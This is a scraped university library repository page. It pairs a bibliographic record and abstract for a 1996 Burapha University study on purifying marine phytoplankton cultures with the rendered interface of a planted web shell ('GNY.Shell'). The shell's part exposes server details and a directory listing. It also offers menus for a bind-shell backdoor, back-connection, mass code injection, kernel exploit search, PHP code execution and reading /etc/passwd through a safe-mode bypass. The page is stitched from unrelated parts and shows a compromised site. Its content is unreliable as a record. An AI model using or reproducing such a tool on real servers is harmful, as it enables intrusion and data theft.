การเก็บรวบรวมแพลงก์ตอนพืชทะเลบริสุทธิ์บนอาหารวุ้น.

Titleการเก็บรวบรวมแพลงก์ตอนพืชทะเลบริสุทธิ์บนอาหารวุ้น.
Publication TypeResearch
Year of Publication2539
Authorsธิดารัตน์ น้อยรักษา., อมรรัตน์ ชมรุ่ง., Thidarat Noiraksar., Amonrat Chomrung.
Corporate Authorsสถาบันวิทยาศาสตร์ทางทะเล., Institute of Marine Science.
Institutionมหาวิทยาลัยบูรพา. (Burapha University).
Cityชลบุรี. (Chonburi).
Typeงานวิจัย.
Keywordsสาขาเกษตรศาสตร์และชีววิทยา., แพลงค์ตอนพืช., แพลงค์ตอนพืชทะเล - - ไทย - - ชลบุรี., แพลงค์ตอนพืชทะเล.
Abstractการแยกแพลงก์ตอนพืชทะเล 30 ชนิด บริเวณหาดบางแสน จังหวัดชลบุรี โยทำให้แพลงก์ตอนพืชบริสุทธิ์ 2 วิธี คือ การใช้สารปฏิชีวนะร่วมกันระหว่าง เพนิซิลลิน จี สเตรปโตมัยซิน ซัลเฟต และคลอแรมฟีนิคัล ที่ระดับความเข้มข้นต่างๆกัน และการปั่นให้ตกตะกอนร่วมกับสารปฏิชีวนะ พบว่าทั้ง 2 วิธี ไม่มีผลยับยั้งการปนเปื้อนของแบคทีเรียในแพลงก์ตอนดิวิชัน ไซยาโนไฟต้า และยังเป็นอันตรายต่อเซลล์ของแพลงก์ตอนพืช ส่วนดิวิชันคลอโรไฟต้า และบาซิลลาริโอไฟต้า พบว่ามีการปนเปื้อนของแบคมีเรียจากการทำให้บริสุทธิ์ด้วยวิธีการปั่นตกตะกอนร่วมกับสารปฏิชีวนะ มากกว่าการใช้สารปฏิชีวนะเพียงอย่างเดียว Isolation of thirty species of marine phytoplankton from Bangsaen Beach, Chon Buri Province, were purified by two methods. The first, was using various antibiotic combination (penicillin G, streptomycin sulfate and chloramphenical) at different concentrations. The second was using centrifugation followed by antibiotics treatment. The two methods were not effective in eliminating bacteria of Division Cyanophyta and caused toxic to the cell. Moreover, phytoplankton of Division Chlorophyta and Bacillariophyta were contaminated by bacteria during the purification by using centrifugation with antibiotics more than by using antibiotics only.
Research Notesได้รับทุนสนับสนุนงานวิจัยจากเงินรายได้มหาวิทยาลัยบูรพา ประจำปีงบประมาณ 2539.
Alternate TitleThe collection of pure culture of Marine Phytoplankton on solid media.
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 281.24 GB of 389.83 GB (72.14%)Server IP: 10.32.1.15 - Your IP: 54.161.191.154

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 22.11.2014 14:57:42 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 14.08.2014 08:51:27 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0219 ]:.